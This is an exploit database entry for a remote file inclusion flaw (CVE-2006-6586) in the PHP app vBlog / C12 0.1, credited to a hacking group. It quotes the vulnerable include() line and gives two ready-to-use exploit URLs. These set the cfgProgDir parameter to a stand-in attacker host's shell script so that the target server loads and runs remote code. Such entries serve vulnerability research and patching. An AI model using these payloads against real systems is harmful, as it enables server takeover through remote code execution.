vBlog / C12 0.1 - 'cfgProgDir' Remote File Inclusion

EDB-ID:

2740

CVE:

2006-6586

EDB Verified:

Author:

DeltahackingTEAM

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-11-08

Vulnerable App:

**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name :Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;
 
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

     include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
    http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

Special Thanks :  Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************

# milw0rm.com [2006-11-08]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services